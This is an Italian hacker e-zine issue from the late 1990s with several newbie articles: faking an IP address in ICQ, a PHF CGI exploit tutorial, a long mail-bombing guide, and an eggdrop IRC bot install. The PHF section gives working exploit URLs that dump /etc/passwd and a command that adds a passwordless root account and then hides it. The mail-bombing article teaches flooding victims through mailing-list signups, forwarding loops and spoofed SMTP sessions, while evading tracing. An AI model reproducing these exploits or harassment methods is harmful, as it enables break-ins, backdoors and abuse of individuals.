scritto per essere letto dai newbies quindi se siete hacker o giu' di li' potete
saltarlo tranquillamente. Prima di tutto sappiate che io sono solo un newbie e
NON un hacker quindi se volete consigli su qualcosa scrivete pure a n0body88@freemail.it
ma pliiiiiiis non mandate email del tipo:
- come si buca la nasa?
- come si fa a diventare hacker?
Alla prima domanda non saprei come rispondere....e cmq ci tengo alle pal..ehm alla pelle....
Alla seconda domanda vi rispondo dalla e-zine xche per diventare hacker bastano poche basilari cose:
1) avere un picci su cui provare, tentare, cercar di riuscire, sperimentare,
insomma ci siamo capiti ^__^
2) conoscere uno o piu' linguaggi di programmazione, utile ma non essenziale
all'inizio, poi piu' avanti si va meno si migliora senza nessun linguaggio...
3) avere uno o + ^__^ collegamenti a internet per navigare nella rete
A questo punto cio' che contraddistingue un hacker da un utente qualsiasi
quale e'? avere il bo o netbus? La differenza e' solo una: la sete di conoscenza,
quell'irrefrenabile emozione che si prova quando si capisce qualcosa , la voglia
di capire cio' che nessuno vuole capire ma che tutti vogliono usare. Un esempio
classico e' il bo. Quanti di coloro che usano il bo saprebbero fare una backdoor
loro? Pochi, triste ma vero.
Io ho provato come molti altri non ho fatto il noBOdy ma almeno ho tentato ed e'
venuta fuori la mia... mezza schifezza (+ che una backdoor era un semplice ping
tra due form server e client su porta scelta all'inzio....ma mi ci sto mettendo dietro ^__^)
Adesso mi direte ok ho il pc, conosco questo o quel linguaggio e sono collegato e ora?
E ora direzionatevi su un motore di ricerca cercate "hacker" (ps: non scrivetemi per
dire non ne trovo uno okki?). Fatto? Ok ora avrete davanti uno dei tanti siti
hacker con le solite pagine ICQ, IRC, PROGRAMMAZIONE, TESTI, PROGRAMMI. La strada
da seguire non e' PROGRAMMI (tanti la scelgono per primi) ma bensi' TESTI.
Fatto ora avrete davanti decine se non centinaia di testi (99% in inglese) e
non avete che la possibilita' di scegliere in cosa "specializzarvi"
(phreak/crack/hack/virus/programmazione) avendo l'accortezza di non tentare di
specializzarvi in phreaking leggendo qualche txt americani, poiche' tra qui e'
li' cambiano molte cose (anche se potrei sabgliarmi xche non so niente di phreak)...
Dopo aver letto + di 6/7 doc sullo stesso argomento provate a vedere se lo avete
capito e se sapete usarlo/applicarlo/spiegarlo e se non va rileggeteli. Poi
riprovate e se non va entrate in irc o in icq e chiedete a gente + esperta di
voi se possono indirizzarvi in posti dove il problema e' spiegato meglio o se
loro hanno il TEMPO di spiegarvi. OK? Io sono un newbie, e forse non saro' mai
un hacker, ma se ho imparato una cosa in questi mesi in cui mi sono dato a
questo...hobby ^__^ e' che se c'e' qualcuno in difficolta' lo si aiuta, altrimenti
si andrebbe contro i principi dei VERI HACKER e dei newbies (questo discorso
pero' non vale se questo qualcuno [ps: a me non e' mai successo, quindi non ho
di questi problemi ^__^] fa domande tipo "mi insegni come diventare hacker?"
...sinceramente quanti di noi newbies hanno letto il txt dentro allo zip di
bo prima di chiedere come si usa?).
Ora navigate, leggete, provate, leggete, provate e se diventate MITICI allora
potete passare a linux o unix e li' cominciate con i consigli di zerocool
sopra scritti....
Spero che questo articolo sia letto dalle decine di newbie che postano domande
inutili e senza aver letto i post precedenti sulle news e ricordatevi: newbies
si nasce, hacker si diventa (imo). ^__^

N0bodY88

ps: se tutto questo vi sembra una stronzata.... liberi di pensarlo :-)
pss: se siete gia' nella "scena"(ue' che parolone!) come non sono (ancora...si
spera!) io allora capirete che nulla e' facile come scritto nel titolo...

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³COME NASCONDERE L'IP IN ICQ (MA SOLO IN QUELLO)³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Cio' che scrivo qui e' solo il riassunto e la traduzione in italiano del doc
fatto da Scru un hacker (credo) inglese o cmq estero.
Prima di spiegarvi come fare a nascondere il vostro ip dai lameroni di turno
devo prima mettervi in guardia che quando l'ho fatto io non mi andavano piu'
le CHAT e il trasferimento di FILE.
Operazioni da eseguire per fare in modo che il vostro ip agli altri appaia
127.0.0.1 o qualsiasi ip voi vogliate:
Step 1: Cliccate sul bottone di ICQ.
Step 2: Cliccate Preferences.
Step 3: Cliccate sulla scritta Connection.
Step 4: Selezionate "I am using a permanent internet connection (LAN).
Step 5: Selezionate "
I am behind a firewall".
Step 6: Cliccate sul pulsante firewall settings.
Step 7: Selezionate "
I am using a socks4 proxy".
Step 8: Cliccate sul pulsante next.
Step 9: Inserite un IP falso nella casella di testo "
SOCK4 Host:".
Step 10: Cliccate sul pulsante next.
Step 11: Cliccate il pulsante done.
Step 12: Riavviate icq.
Ora quando andrete on the net con icq chi vi guardera' l'ip trovera' il fake ip.
Se volete riavere il vostro ip normale bastera':
Step 1: Cliccate sul bottone di ICQ.
Step 2: Cliccate Preferences.
Step 3: Cliccate sulla scritta Connection.
Step 4: Selezionate "
I am using a modem".
Step 5: Riavviate icq.

N0bodY88

PS: qualcuno mi dica se i problemi con le chat e il trasferimento di file non
va solo a me o anche ad altri ma cmq se non funziano anche a voi penso che
non trovando il vero ip icq non riesce a trasferire i file e ad aprire chat
xche il vostro amico/nemico tenta di connettersi a voi che non avete
visualizzato il vostro vero ip, quindi.....
PPS: provate a mettere come ip 127.0.0.1 come consigliato sopra che se trovate
il lamerone giusto e' possibile che si autonuki (o come @zz si dice)!

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

0000000000000000000000000000000000000000000000000
0 0000000000000000 0
0 00000000000000 0
0 BUGGATI TU CHE MI BUGGO ANCH'IO 0
0 00000000000000 0
0 0000000000000000 0
''''''''''''''']L0rD D3sTRuçTi0N[''''''''''''''''

--------------------------------------------------------------------------------

Materiale :

1 Lt di Coca cola finta (quella del discount)
1 Telefono che rompe il cazzo ogni 5 min...

P.S. : PiGPeN se leggerai mai questo articolo scusa...ti ho copiato un po
lo stile..;P

Bhe, cominciamo...
Allora vi parler• dei bug che mezzo mondo conosce ma che alcuni appena
entrati nel fantastico mondo dell'hacking non conoscono o non conosco fino
in fondo.
Se quello che scrivo vi fa schifo...bhe, mettetevi con la faccia sul
cesso e infilatevi due dita in gola ;o=

'''''''''''''''''''''''''''
'...oooOOO] PHF [OOOooo...'
'''''''''''''''''''''''''''

Uno dei bug pi— conosciuti al mondo è quello del PHF...
In pratica tramite il PHF si possono fare moltissime cose, come vedere il
file passwd, aggiungere un account, modificare file e via dicendo, sta
tutto nella vostra fantasia...
Cominciamo col vedere come si usa questo PHF...
Di cosa avete bisogno, be, le cose non sono molte :

- 1 Web Browser
- 1 Server con il PHF bacato ;P

Allora mettete come indirizzo la seguete stringa :

http://www.vittima.com/cgi-bin/phf?Qalias=X%0a/bin/cat%20/etc/passwd

...e premete invio.
A questo punto se non avete fatto errori e se il PHF è bacato otterrete un
cat del file passwd, altrimenti se non lo è...un messaggio di errore.

Ma con questa stringa possiamo fare tante altre cose, come ad esempio dare
il comando "
id" e vedere con che permessi gira il PHF, e se siamo un po
fortunati potremo anche avere i permessi di root.

Digitiamo :

http://www.vittima.com/cgi-bin/phf?Qalias=X%0a/bin/id

Se il server ci risponde una cosa del genere ...

uid=0(root) gid=0(root) groups=0(root)

...allora potete cominciare a sentirvi Di0...il PHF gira con permessi
root, quindi potete fare di tutto, dipende dalla vostra fantasia...ma
ricordate, non cancellate mai nulla che non abbia a che fare con il vostro
ip o con qualcosa che possa farvi rintracciare, ricordate che se
distruggete un sistema, per me sarete sempre dei lamer merdosi....

Detto questo aggiungiamo un account al passwd passando al PHF il seguente
comando :

P.S. : ricordatevi che sul web lo spazio si rappresenta con la stringa %20

echo "
hacker::0:0::/home/lor1:/bin/bash" >> /etc/passwd

Et voila ! Avete aggiunto un account al file passwd e ora potete
telnettarvi utilizzando l'account hacker senza password....
Ricordatevi di scegliere sempre nomi che non destino sospetti ed una volta
entrati spostate il vostro account a met… del passwd in modo da
confonderlo con gli altri.

Ok, spero che abbiate capito come funzica il PHF, ora sta alla vostra
fantasia fare quello che volete...
Controllate sempre il file /etc/inetd.conf per vedere quali servizi remoti
sono attivi etc etc...

Ok, Yo a tutti voi e ricordatevi

"
Think before hack, be an elite, not a stupid busted !!!"

Ciao CyberFratelli !!!!!!

P.S : Se questo articolo vi piace, o vi fa schifo o volete insulatarmi
eccetera eccetera, mailate tutto a lord_dest@iname.com, vi risponder• e
vi insulter• al pi— presto };P

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³------------Che---Bello----Emailizzarci---IN----CORO------------------³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Conmsumo: (in 3 volte diverse)
una fetta di pandoro (senza topicida)
un bicchiere di Martiny Dry,
un panino al crudo (ma perche' sono tornato dagli allenamenti)
Tazza di latte a lunga conservazione con Frosties.

Musica ascoltata:Sound Track di Quake 2, Bach, un programma su "
6"
Saluto: Lux, Eso, Lord Destruction, TiZiO, Ghimlet, Phroid, il papa'

Mail Bombing!!!

Allora, il mail bombing e' uno degli attacchi + utili e efficaci che si
possono fare.... peccato che e' anche uno che, a seconda dei casi, puo'
essere inutile, inefficace e AUTOLESIONISTA !

Mi sembra superfluo dire che, se vi sta' sul khazzo un SysAdmin di un server
con una 1024K sotto, e gli mandate l'impossibile... lui nemmeno se ne accorgera',
se viceversa a un vostro conoscente che vi sta' sul kazzo, gli iniziate a far
trovare 5-6 mega di roba nella mailbox ogni giorno... penso sia ben + dannoso...
se i 5-6 mega non bastano... bhe...questo file e' scritto apposta! ;)

Allora, i metodi + conosciuti per fare mail bombing sono 3:
Spam mode (lamer, inutile, lento, un suicidio)
con Mailing List (bello, pulito, dannoso... senza dubbio una bella cosa :)
Con grossi attach (da bello a potenzialmente immortale)

Sebbene io disliko molto la mail bomb spam mode, volgio mostrare a tutti quanto
sia INUTILE e BRUTTO questo attacco...

allora, chi di voi per Windoze non ha mia avuto "
divine ascension" o "X-mail"
o altri programmini cazzosi che si trovano in giro? Prendiamo come esempio il
"
Divine Ascension 3", questo programma ti consente di inserire l'indirizzo
falso del mittente, l'indirizzo della vittima, il titolo, il testo del messaggio
e il numero di messaggi... cosa succede ? dopo che tu fai "
send" inizia a spedire
UNO A UNO i messaggi, in questo modo il tempo che ci metti tu a spedire i messaggi
e' pressoche' simile a quello che ci mettera' lui a scaricarli... Ma non e' tutto...
ecco come si presenta l'header del messaggio (o di uno dei 10000 messaggi)

Return-Path: <spammer@lamer.it>
Received: from SMTP.della.vittima (host.della.vittima [19X.XX.XX.XXX])
by host.dello.spammer (8.8.4/8.8.8) with ESMTP id UAA23316
for <vittima@host.vittima>; Sat, 19 Dec 1998 20:28:57 +0100
Received: from userID@dello.spammer (root@host.spammer [XXX.XXX.XX.XXX])
by SMTP.della.vittima (8.8.5/8.8.5) with ESMTP id UAA20651
for <vittima@host.vittima>; Sat, 19 Dec 1998 20:37:21 +0100 (MET)
Sender: spammer@lamer.it
Message-ID: <367BA65D.E33EA336@host.spammer>
Date: Sat, 19 Dec 1998 14:13:01 +0100
From: DIO <spammer@lamer.it>
Reply-To: cha.cazzo@rispondi.it
Organization: POWER IN BOMB (lamer in prison! :)
X-Mailer: Divine Ascension HellFire
MIME-Version: 1.0
To: merdaccia <vittima@sfigata.it>
Subject: la morte calera' su di te (e la multa su di me)
References: <003e01be2a90$1392d640$6264f4c2@merdaccia>
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-UIDL: cb2d553d863f0ce2536cae082e24aebc

Come vedete, appare TUTTO di voi... manca solo la data di nascita... ma basta
che c'e' l'IP e vi beccano. E' ancora + facile andare a chiedere chi sei,
perche' li bello nel header c'e' il vostro server SMTP (e anche versione di
sendmail ecc..ecc...)

In generale, potete usare questi programmi (Divine, X-mail) per spedire la
posta, nel caso vi stancasse di Microzoft Outlook.

M41|_b0mB & M41|_1n6 L15t (mailbomb & mailing list)

P.s. --> pensate che qui scriva qualcosa di utile?
P.z. --> non e' vero, lo faccio solo per farvi
P.x. --> consumare gli okki (c) Lux
P.@. --> (sono pazzo, ma non ditelo a nessuna :)

Mail bomb & Mailing List (2)

Allora, come tutti sappiamo le mailing list, sono servizi abbastanza utili,
anzi, utilissimi x l'informazione di massa! ma pensate a uno sfigato qualunque
che si trova iscritto a 20 mailing list (20 solo perche' siete stati buoni con
lui! ) senza sapere quali sono, come si deiscrive, di cosa parlano, e soprattutto,
finche' non si "
unsubscribe" continuera' a ricevere mail !!!

Allora, c'e' da dire che il programma "
AVALANCHE" MI SEMBRA facesse anche
questo, ovvero l'iscrizione automatica a un bel po' di mailing list
messaggiando al Majordomo l'iscrizione della vittima.

Ah gia' e' una guida x Newbie... allora magari servono delle delucidazioni...:
Le mailing list sono strutture che si appoggiano a un server, quando arriva un
messaggio esso viene forwardato automaticamente a tutti gli iscritti della
mailing list, per iscriversi alla mailing list (o per iscrivere un altro)
bisogna mandare un messaggio a Majordomo@NOME.della.ML.domain con scritto:
Subscribe [nome-lista] indirizzo@indirzzo.ping
Normalmente, [nome-lista] va' in quelle mailing list con MOLTE mailing list,
ma tutte con un solo Majordomo, questo perche' se ci sono:
lista1@host11.it
lista2@host22.it
non ci possono essere + majordomi, cosi' l'iscrizione viene gestita solo da uno.

Allora, dopo che ci si iscrive ad una ML arriva la risposta del Majordomo con
scritto solitamente (se non avete sbagliato niente) SUBSCRIPRION SUCCESSIFUL !!!
e poi dicono anche "
for subscribe mail to Majordomo@cazzo.figa" no subject body:
UNSUBSCRIBE [LISTA] mail@tua.it

Ma se noi iscriviamo uno che NON vuole essere iscritto... mi sembra ovvio che
non dovra' riceverlo !

Allora cosa si fa'? una persona ingeniosa lo trova subito... ma si diventa
ingeniosi anche grazie all'esperienza, ed e' una cosa che a volte manca... :(

Andate su www.iname.com o www.poboxes.com o un'altro server che dia free-email
con il forward impostabile, createlo, e impostate l'indirizzo a cui viene forwardata
la posta al vostro indirizzo, iscrivere l'idirizzo che forwarda (quello su iname
o su poboxes) alla mailing list, NON QUELLO DELLA VITTiMA... ma allora voi direte:
"
Vecna Porko! ma che cazzo dici, in questo modo i messaggi delle 16436 mailing
list a cui lo iscrivo arrivano a me! e che cazzo! mi bombardo da solo ???" vecna
risponde paziente: "
STA' CALM ! CASU' !"
Voi dovete ricevere solo il messaggio di conferma dei majordomi, poi, cambiare
l'indirizzo di forward con quello della vittima, e poi sorridere certi del male
partorito.

Nota --> conosco solo INAME e POBOXES che facciano il forward automatico,
nOTA --> se voi ne conscete altri, vi sarei grato del li comunicate al
n0t4 --> vecna@mail.com - tnx

Allora, ora bisogna fare alcune precisazioni sulle mailing list...
NON fare mailbombig sulle mailing list di tipo spam mode, fate attenzione
che alcune mailing list concedono SOLO a quelli iscritti di postare dentro,
non dite in lista che bombardate qualcuno, e poi, sempre, SIATE PARANOICI !
ma questa nota si adatta di + ad altre situazioni.

Poi, difese delle mailing list... ALcuNE MAILinG LiST tiPO EuROHkacK COnCEDoNo
SOlo L'iScRIzIoNe A Chi Ha UNa CertA ChiaVe, LoRo StessI La DaNNo, E la DanNo
a TuTtI, ma E' Un'OPeraZIOne CHe coMPlIKa un Po Il LavorO, E perSONalmENTe,
Non StareI li A PerDERe TEmpo Per Far MaLE AGli AltRi.

********* 0ggi non parlo di filosofia, ma nemmeno di hacking ************

Bhe, oltre quello, vi consiglio di cammuffare l'indirizzi emittente, e quello
delle risposte, in modo che sembri che provenga dalla casella che usate per
l'auto-forward, questo perche' alcune mailing list, non iscrivono un indirizzo
diverso da quello della mail!

Allora, per finire sta' minkiata sulle ML (la chiamo minkiata xke' e' lunga,
ma indubbiamente efficace! ) avrei voluto darvi una lista di mailing list...
purtroppo io ne seguo poche, e il cazzone che doveva darmi una lista + sostanziosa
e' sparito... (ma potete usare Altavista (www.altavista.com)...eehh si, oggi non
si usa il + fedelissimo motore di ricerca "
http://astalavista.box.sk")
Cmq se qualcuno di voi ha a casa Avalanche, trova una lista li' dentro.

Fare i Cattivi........
Allora, questo metodo non l'ho incluso tra i primi 3, ma vi assicuro che
e' il metodo + potente in assoluto, un vero attacco sopraffino, divino,
potente, ma prima di ogni aggettivo va' specificato INFINITO !!!

Allora, andate su www.iname.com o www.poboxes.com o un'altro server di forward
(e ripeto che se ne sapete altri DITEMELO ) create 2 mail box, come esempio
prendero' 123@123.123 e abc@abc.abc

su 123@123.123 settate il forward a abc@abc.abc e in CC alla vittima
su abc@abc.abc settate il forward a 123@123.123 e in CC alla vittima

Mandate una mail a 123@123.123 o all'altra... sapete cosa succede... :) ovvero
il + potente e infinito spam che si possa avere !!!

Logicamente, saranno state previste delle difese da queste cose, o anche difese
per il server sfruttato, per evitare di continuare a copiare mail continuamente
da una sua directory a una sempre sua directory... queste difese, mai verificate,
possono essere:

!!-- >> Un server non concede il forward automatico a un'indirizzo << --!!
!!-- >> dello stesso server. << --!!
??-- >> Un server cancella mail uguali dopo un certo numero << --??

Allora che si fa' ? stesso discorso della mente allenta, ma soprattutto violenta
e perversa...ecc.../etc...e queste sono le soluzioni da me elucubrate:

fare il forward tra E-mail di server diversi, una su iname. una su poboxes,
una da un'altra parte, poi, per quelli capaci di usare PINE e ELM o XMAIL
(Xmail programma di posta x Linux, non X-Mail o Extreme mail per fare inutile
spam) puo' usare una shell account free tipo quelle di sdf.lonestar.org o
cyberspace.org, o una shell non free, ma tradata su IRCNet canale #shell & #shells,
ah dicevo... si possono impostare forward automatico e/o risposta automatica...
allora, basta far il forvard automatico, e impostare in copia nascosta l'indirizzo
della vittima anziche' /sended-mail (cartella della posta inviata) (questo e'
utile anche per non raggiungere il size limit concesso dalla shell) inoltre il
file .signature consiste nella scritta che verra' addata in coda al messaggio,
quindi vi consiglio di mettere un bel file da 100K come signature, ma anche la
grandezza e' poporzionale alla vostra bastardaggine, quindi se mettete 500K
farete + danni, attenzione pero' a una cosa... server come iname, poboxes,
lonestar ecc... danno un size limit per il messaggio, una cosa utilissima
sarebbe trovare il modo per DIVIDERE I messaggi che superano i 60K, 100K, 10K
...in questo modo i danni sarebbero ancora maggiori.

Inoltre la tecnica x dividere i messaggi puo' essere fantastica anche per un
altro motivo... ma lo illustro con la prossima tecnica.

M4iL B0mB Con SeN|)mail - 0 forse Con GroSsi 4TT4ch/Chiamatelo come volete

Tratto + che altro da delle FAQ di Packet Storm of Security. Telnettatevi alla
25 di un server a caso, come sempre si consiglia di usare un server Filippino,
Russo, Rumeno, Croato, Coreano ecc.../etc... mi raccomando, + lontano e' e + e' bello ;)
Arrivati, vi troverete davanti alla solita procedura di utilizzo Sendmail, scrivete:
HELO nomeserver.com (falso of course)
MAIL FROM:<fake@killer.death>
RCPT TO:<vittima@distrutta.death>
DATA
e qui scriviamo il testo del messaggio, P.S. guardate che, pur inserendo un fake
in HELO, i nuovi server prendono l'ip del reale sender e sbatterlo sull'header
come primi recieved. altro pezzo di messaggio insulti correlati al motivo della
mail bomb vecna declina ogni responsabilita' vi chiedo di usare il cervello, non
serve fare queste cose per sentirsi + bravi, + hacker... no raga... non e' cosi'
che si fa'.
NO MAIL BOMB SE NON PER BUONI MOTIVI
capito ? o devo ripetere?
BUONI MOTIVI X FARE MAIL BOMB SONO POCHI.
a menoche' non avete abbastanza conoscenze tecniche, coraggio, un gruppetto di
amici e allestite un gruppo di crackers.
altro pezzo di messaggio...
ricordo che scrivo questo testo solo per l'informazione e per la sua liberta'...
e ricordo che se ora sto' scrivendo e' perche' sono ancora sotto la funzione
DATA di sendmail
.
QUIT

infatti, quando si fa' invio e poi si digita il punto su una linea sola, succede
che il testo del messaggio e' completo, e viene spedito.

MA questa non e' una mail bomb vero ? e come si fa allora ?

HELO morte.tua
MAIL FROM:dio@paradise.net
RCPT TO:lamish@victim.net
REPLY:webmaster@microsoft.com
CONNECT: latte.uth anonymous omonimous@server.porn
BINARY
GET /home/ftp/pub/immenso/immenso.tar.gz
GET /home/httpd/index.html
DATA
testo msg
.
QUIT

Spiegazio:
REPLY e' l'indirizzo dove rispondere, CONNECT io non l'ho mai usato, ma sulle
FAQ che ho trovato indicavano anche questo e per completezza l'ho messo.
BINARY = tipo di file, credo, serve per specificare che il tipo di file sara'
un file binario... forse anticipa a sendmail che dovra' usare MIME per l'attach...
...ma e' una cosa che credo io, l'utilita' di BINARY la ignoro. GET = attacch
u file ! (consigliati file GROSSI ! ) mettendo + get vengono inviati + filez

SVANTAGGI: il tuo ip rimane, quindi si deve fare solo dopo uno spoofaggio
o un bounce. ALTRO SVANTAGGIO: il messaggio e' solo uno, anche se immenso.

Come e' Bella Sendmailz!!! Come sono belli i suoi buki... quanti buki ci sono...
Exploit vs Sendmail 8.8.8 = HELO HOLE (e qui c'e' pure il giuoco di parole :)
Ma prima di introdurvi all'exploit della 8.8.8, qualche parola sulla moralita' del matrimonio, e il fatto che io sia la nemesi del mio Linux. ecco...
-Sherlohk Holmes, che scuola hai fatto?
-Elementare Watson, Elementare....

Tratto da :Manuale di Vecna agli exploit di Sendmail, a sua volta tratto da PSS.
Questo e' un semplice sistema utilizzato per masherare o nascondere l'header dei
messaggi. io stesso ho constatato coma alcuni server smtp riportino nell'header
l'ip di colui che ha scritto il messaggio, cosi', in caso di eventuale mailbombing,
possa essere rintracciato.
nella libreria conf.h v… definito:
#define PICKY_HELO_CHECK 1
Questo pu• forzare sendmail che per mezzo del syslog causerebbe un
X-Authentication.Warning che apparirebbe nell'header.
questo solo se il loglevel in sendmail.cf Š maggiore di 3 (anche se di default Š 9 :)
>From spam@flooders.net <mailto:spam@flooders.net> Mon Jan 5 22:09:05 1998
Received: from xxxxxxxxxxxxxx... [infinite 'x'] ...xxxx
Il resto l'ho tolto perche' ho saputo che gia' un'altra persona ha spiegato
quest'exploit, su questa enzine spray nasale, quindi andate a leggere la sua
sezione. (se per la volta prossima serve una raccolta di exploit contro sendmail
prometto a tutti che la faro' ;)

Implementazione:
Da una shell, inviate un messaggio con in attach 2 o 3 volte il kernel, 2 o 3
volte qualcosa di grosso ecc... ecc... il vosto ip non appare (non appare,
esatto), il messaggio e' uno e grosso, ma se riuscite a impostare il programma
in modo che divida i messaggi superiori ai tot K con 10K<tot K<60K la vittima
sara' subissata di messaggi, e, finche sono 100 messaggi da 2 K e' una cosa...
quando sono 100 messaggi da 60K e' un'altra ... ma non preoccupatevi... NON NE
INVIERETE MAI COSI' POCHI ;)

P.S. nel caso lo volete inviare al server del pentagono, del vostro governo,
della seclab e di www.nsa.gov, ricordatevi che il vosto ip rimane loggato nei
log del server della shell.

Questo articolo e' terminato, ma voglio ricordare a tutti questo:
NON FATE CASINI
NON FATEVI MALE
NON TOCCATE LA MIA MAIL BOX X COSE NON SERIE.
Vecna

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
Vecna.
Nota di N0bodY88: il prossimo articolo e' stato messo fuori dalla sezione irc
xche' sarebbe passato solo come un sotto articolo della sezione irc, mentre
imo e' un gran bell'articolo, utile e...da mettere in evidenza {:-)

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³COME SI METTE UN BOT?³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Buon giorno a tutti!
Quando mi chiesero se volevo scrivere un articolo per questa rivista ero un po'
incerto, forse perchŠ credo di avere ancora molto da imparare visto che non mi
ritengo uno dei "
maestri" nel campo.
Alla fine per•, come vedete :) l'ho scritto. Il mio scopo Š quello di aiutare
quei principianti che, stufi di vedere il proprio canale di IRC perennamente
sotto take :( , decidono di provare ad installare un maledetto BOT! ;)
Per chi non lo sappia (veramente pochi visto che quasi su ogni canale c'Š un
bot) un bot Š un "
robot", che oltre a tenere sempre attivo un canale, oppa solo
chi volete ed esegue un mucchio di altre operazioni, ma solo quando glielo dite
voi (o almeno dovrebbe fare cos hihi).
La prima e fondamentale cosa che dovete fare Š quella di procurarvi una shell
sulla quale sia possibile installare un eggy. Hackate o tradate... Š uguale basta averla!
Fatto ci• siete a met… dell'opera. Quello che dovete fare ora Š uploadare il
bot nella shell. Potete farlo collegandovi via shell ad un ftp come ftp.sodre.net
scaricando ad esempio il file eggdrop1.1.5.tar.gz (pub/eggdrop). I comandi da
usare sono: "
ftp ftp.sodre.net", (inserendo anonymous come name e l'indirizzo
e-mail come password); per prelevare il file scrivete "
get nomefile". Concluso
l'upload scrivete "
quit" per tornare alla vostra shell.
Ora avete tutto ci• che vi serve per iniziare lavorare. Per decomprimere il file
dovete scrivere "
gzip -d nomefile.tar.gz" e subito dopo "tar xf nomefile.tar".
Decompresso il file rinnominate la directory del bot in qualcosa come "
../ ";
questo Š un piccolo trucco per far si che la directory del vostro bot sia un po'
pi— nascosta. Entrateci dentro e scrivete "
./configure", finito ci• scrivete "make".
Se tutto Š andato come dovrebbe non dovreste aver avuto nessun segnale di errore.
(in caso contrario ci potrebbero essere problemi con le tcl, ed installarle non
sempre porta ad un buon risultato).
Prendete il file eggdrop.conf ed apritelo sul vostro PC con un editor come wordpad.
Questo Š il file di configurazione del bot. In esso sono contenute tutte le
informazioni riguardanti nick,server,canali ecc. Modificate il file a vostro
piacimento e rimettetelo nella shell.
Quindi scrivete "
eggdrop -m eggdrop.conf" ed il gioco Š fatto. Vi dico gi… da
subito che non sempre Š tutto cos facile....anzi spesso si hanno problemi con
tcl o con altre librerie strane;P.
In questo caso potete provare ad installare un precompilato (ve li consiglio).
Ci• dovrebbe eliminare il problema delle tcl e molti altri. Inizialmente dovete
scrive "
uname -a" per vedere su che sistema operativo state lavorando. DopodichŠ
dovete trovare un eggdrop precompilato. Uno dei siti che li forniscono Š

http://www.unseen.org/~simpson/

scaricate quello corrispondente al vostro OS.
Ora basta decomprimerlo (vedi sopra) nella directory del bot, e senza fare "
./configure"
e "
make", scrivete solamente "chmod 777 eggdrop ".
Se avete svolto ogni passo come vi ho detto ed avete una buona shell il vostro
bot sar… gi… nel vostro canale pronto ad aspettare un comando :D
Credo di esservi stato d'aiuto visto che quando ho iniziato, avrei voluto avere
anche io un documento simile ma per mia sfortuna non l'ho mai trovato (la maggior
parte del materiale Š in inglese).
Vi do un consiglio: se avrete dei problemi, rompete le scatole a tutti quelli
che ne sanno un po' pi— di voi, cos facendo otterrete quasi sicuramente un
buon risultato!!! ;)
Ja[3]Ck

